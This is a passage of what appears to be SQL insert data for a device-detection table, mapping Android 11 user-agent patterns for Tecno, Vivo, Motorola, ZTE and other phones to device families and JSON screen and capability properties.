Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; T770H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; T781) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; T782H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; T799H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; TECNO BD2p) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; TECNO CG6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; TECNO CG6j) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; TECNO KF6i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; TECNO KF6n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; TECNO KF7j) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; TECNO LC7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; TECNO LE7n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; TECNO PR651H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2022) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2023) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2025) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2026) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2027) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2030) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":876,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2031) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":876,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2035) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":876,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2036) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":876,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2038) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2039) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2041) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":876,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2043) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":875,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2061) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2066) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":875,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; V2109) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":876,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; XQ-AS52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; XQ-AU51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; XQ-AU52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; XQ-BT52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; ZTE Blade A51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto e20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto e40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g 5G plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g fast) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":876,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":876,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g stylus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":876,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(10)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(100)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(20)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(30)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(50)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(60)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":984,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(60)s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":984,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(8) power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":876,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(8)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":235,\"screenHeight\":510,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(9) play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(9) plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; moto g(9) power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":937,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; motorola edge) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; motorola one action) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; motorola one fusion) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; motorola one hyper) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; motorola one vision) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1818) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1819) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1904) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1906) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1915) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1919) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1933) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1935) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 1938) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":833,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 2007) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; vivo 2018) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx 10 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx 9 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx 9 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx 9T Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx 9T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx Note 10 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome 